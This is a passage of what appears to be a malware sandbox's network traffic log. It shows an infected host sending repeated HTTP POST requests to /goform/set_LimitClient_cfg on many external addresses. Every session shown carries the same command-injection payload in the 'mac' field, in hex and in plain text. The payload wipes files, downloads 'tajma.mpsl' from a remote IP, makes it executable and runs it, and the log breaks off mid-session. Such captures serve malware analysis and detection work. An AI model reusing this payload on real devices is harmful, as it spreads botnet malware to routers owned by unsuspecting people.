                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        445192.168.2.2337060145.163.16.2228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294621944 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        446192.168.2.235590018.255.90.1468080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294634104 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        447192.168.2.234551477.130.5.1948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294667959 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        448192.168.2.233767667.52.85.1148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294684887 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        449192.168.2.2334566198.96.35.1148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294725895 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        450192.168.2.235761040.83.251.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294754028 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        451192.168.2.2340376116.99.104.1788080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294780016 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        452192.168.2.235356893.105.226.1478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294876099 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        453192.168.2.234379031.165.115.518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294895887 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        454192.168.2.235392423.181.56.238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294922113 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        455192.168.2.23538989.114.65.1438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294966936 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        456192.168.2.233285660.221.75.2038080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.294992924 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        457192.168.2.235964612.53.143.208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.295018911 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        458192.168.2.2334866144.63.128.68080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.295042992 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        459192.168.2.2359358183.23.23.1748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.295066118 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        460192.168.2.2349574114.172.184.698080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.295191050 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        461192.168.2.2354582213.233.68.1458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.295314074 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        462192.168.2.2355452185.168.192.1068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.301429987 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        463192.168.2.234644666.131.81.1948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.301493883 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        464192.168.2.2347756192.88.169.488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.301630020 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        465192.168.2.235638439.237.174.698080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302540064 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        466192.168.2.235011451.233.124.2228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302592039 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        467192.168.2.234448640.117.226.1408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302632093 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
